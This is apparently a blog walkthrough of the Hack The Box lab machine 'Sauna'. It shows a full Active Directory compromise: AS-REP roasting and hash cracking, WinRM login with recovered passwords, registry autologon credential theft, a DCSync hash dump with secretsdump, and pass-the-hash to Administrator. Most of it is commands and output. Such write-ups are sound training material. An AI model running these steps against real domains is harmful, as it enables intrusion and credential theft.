Sauna.htb

Sauna.htb

This is a detailed walk-thru for sauna.htb written by dR1PPy

The challenges presented by Sauna walk the line between CTF and Real World very well.
It felt good to spend a day roasting in the Sauna while sharpening the Windows attack skills.
As always a big shout out to the machine creator egotisticalSW. It’s friends like you that help keep these challenges fun.

Enumeration

Services
========

host          port   proto  name          state  info
----          ----   -----  ----          -----  ----
10.10.10.175  53     tcp    domain        open   
10.10.10.175  53     udp    domain        open   
10.10.10.175  88     tcp    kerberos-sec  open   Microsoft Windows Kerberos server time: 2020-03-18 06:48:07Z
10.10.10.175  123    udp    ntp           open   
10.10.10.175  135    tcp    msrpc         open   Microsoft Windows RPC
10.10.10.175  139    tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
10.10.10.175  389    tcp    ldap          open   Microsoft Windows Active Directory LDAP Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name
10.10.10.175  389    udp    ldap          open   
10.10.10.175  445    tcp    microsoft-ds  open   
10.10.10.175  464    tcp    kpasswd5      open   
10.10.10.175  593    tcp    ncacn_http    open   Microsoft Windows RPC over HTTP 1.0
10.10.10.175  636    tcp    tcpwrapped    open   
10.10.10.175  3268   tcp    ldap          open   Microsoft Windows Active Directory LDAP Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name
10.10.10.175  3269   tcp    tcpwrapped    open   
10.10.10.175  9389   tcp    mc-nmf        open   .NET Message Framing
10.10.10.175  49667  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.175  49673  tcp    ncacn_http    open   Microsoft Windows RPC over HTTP 1.0
10.10.10.175  49674  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.175  49675  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.175  49686  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.175  49695  tcp    msrpc         open   Microsoft Windows RPC

During our enumeration we find a possible user.

|_    dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL

We try to run an impacket LDAP preauth script and are able to validate the username format.

python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip sauna.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

No entries found!

python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/hsmith -dc-ip sauna.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Cannot authenticate hsmith, getting its TGT
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set

python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/hugo -dc-ip sauna.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Cannot authenticate hugo, getting its TGT
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

Using this same UID format we test the other possible users found on the webpage.

The Sauna Team

Doing this we find also find the valid username of ‘fsmith’ which provides us a password hash.

python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/fsmith -dc-ip sauna.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Cannot authenticate fsmith, getting its TGT
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0f109c4e7446bdd44ca5b0dc8fb903e9$520e39a3a6065b8a5a8bc691d94e2b377e397bef2a9f2d316f3fd6f7410bfa0813bcc681bf901546d0dc0b77718ebc8cbbb8988793c60da4a05899463e7cc4af9d85f5b87df00766ab0590060a4dbfde88c5bd8b78e660eb64a929a1c701b675dc19166ec45e7e6a3af8e95e9576d9c4b9e1e12c25fe9f885e67aa2630af52864827238a693a7c2b516174cd726b801192a93bfc4dccf9db0c70d77f8f6be434bc733a0d4cc9c320980290a339413fd5b48df3730fe2650866787361057a2d2a95fa08e5ab1bbf0d1c214379131d4ab97edcb51f12bd8377b70dad50196b9434e33772b41f1b8b1b7ccb9bad7198e37fca0d369258e869083e2463a749e10376
hashcat -m 18200 --force -a 0 fsmith-hash.txt /TOOL/rockyou.txt --show
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0f109c4e7446bdd44ca5b0dc8fb903e9$520e39a3a6065b8a5a8bc691d94e2b377e397bef2a9f2d316f3fd6f7410bfa0813bcc681bf901546d0dc0b77718ebc8cbbb8988793c60da4a05899463e7cc4af9d85f5b87df00766ab0590060a4dbfde88c5bd8b78e660eb64a929a1c701b675dc19166ec45e7e6a3af8e95e9576d9c4b9e1e12c25fe9f885e67aa2630af52864827238a693a7c2b516174cd726b801192a93bfc4dccf9db0c70d77f8f6be434bc733a0d4cc9c320980290a339413fd5b48df3730fe2650866787361057a2d2a95fa08e5ab1bbf0d1c214379131d4ab97edcb51f12bd8377b70dad50196b9434e33772b41f1b8b1b7ccb9bad7198e37fca0d369258e869083e2463a749e10376:Thestrokes23
ldapsearch -LLL -x -H ldap://sauna.htb -b '' -s base '(objectclass=*)'

Gaining Access

To validate our credentials we try to dump the AD info.

python GetADUsers.py -all EGOTISTICAL-BANK.LOCAL/fsmith -dc-ip sauna.htbImpacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Querying sauna.htb for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2020-01-24 10:14:15.321116  2020-02-10 09:16:17.478519 
Guest                                                 <never>              <never>             
krbtgt                                                2020-01-22 22:45:30.587720  <never>             
HSmith                                                2020-01-22 22:54:34.140321  <never>             
FSmith                                                2020-01-23 09:45:19.047096  2020-03-18 20:31:24.039258 
svc_loanmgr                                           2020-01-24 16:48:31.678079  <never> 

Ok looks like we have all we need to get our shell.

evil-winrm -i sauna.htb -u fsmith -p Thestrokes23 -s '/var/www/html/win' -e '/var/www/html/win/'

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../
*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt

Escalating Privileges

We copy over WinPEAS.bat to help us with enumeration.
After reviewing the output we notice the following.

Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

From our previous AD dump we noted the actual username as ‘svc_loanmgr’ so we connect back with our new user.

evil-winrm -i sauna.htb -u svc_loanmgr -p Moneymakestheworldgoround! -s '/var/www/html/win' -e '/var/www/html/win/'

Now we have another set of credentials to leverage. But How?

After spending some time trying standard enumeration we decided to just try stealing tokens directly.
Eventually we find we can use secretsdump.py from the Impacket toolkit to extract some User Hashes.

./secretsdump.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK/svc_loanmgr@10.10.10.175 -just-dc
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:d7f0c9f6fe1513213f825b3793e647ae:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:68e94a6f31b980eb073819802d9e1fda0178eb7431cc0a546c7dc57993cdbbfe
SAUNA$:aes128-cts-hmac-sha1-96:1b61a8449f192bdc9a1f019dcd2adaa0
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up... 

Now that we have the Admin hash we use the WMIExec shell to get our flag.

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff Administrator@10.10.10.175
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd users\Administrator\Desktop
C:\users\Administrator\Desktop>type root.txt

And now we can leave the sauna nice and roasted.
Thanks for Playing Today!

Resources

Sauna.htb
https://www.hackthebox.eu/home/machines/profile/229

https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASbat/winPEAS.bat

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: